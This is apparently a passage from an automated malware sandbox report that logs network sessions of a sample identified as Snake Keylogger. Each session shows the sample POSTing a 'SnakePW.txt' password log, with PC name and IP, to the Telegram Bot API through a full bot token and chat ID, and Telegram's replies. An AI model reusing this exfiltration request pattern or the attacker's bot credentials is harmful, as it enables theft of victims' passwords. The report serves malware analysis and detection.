                                                                    2022-06-26 07:33:25 UTC186OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 30 32 30 30 35 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f0200579Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:25 UTC186INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:25 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:25 UTC186INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66869,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228805,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    111192.168.2.549962149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:25 UTC187OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f0547b32
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:25 UTC187OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 30 35 34 37 62 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f0547b32Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:25 UTC188INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:25 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:25 UTC188INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66870,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228805,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    112192.168.2.549964149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:25 UTC189OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f09276e5
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:25 UTC189OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 30 39 32 37 36 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f09276e5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:26 UTC189INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:26 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:26 UTC190INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66871,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228806,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    113192.168.2.549965149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:26 UTC190OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f0d07341
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:26 UTC191OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 30 64 30 37 33 34 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f0d07341Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:26 UTC191INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:26 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:26 UTC192INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66872,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228806,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    114192.168.2.549966149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:26 UTC192OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f10c111a
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:26 UTC192OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 31 30 63 31 31 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f10c111aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:26 UTC193INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:26 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:26 UTC193INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66873,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228806,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    115192.168.2.549967149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:26 UTC194OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f142e3e0
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:26 UTC194OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 31 34 32 65 33 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f142e3e0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:27 UTC195INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:27 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:27 UTC195INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66874,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228807,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    116192.168.2.549968149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:27 UTC195OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f17e7ee5
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:27 UTC196OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 31 37 65 37 65 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f17e7ee5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:27 UTC196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:27 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:27 UTC197INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66875,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228807,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    117192.168.2.549969149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:27 UTC197OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f1b5550f
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
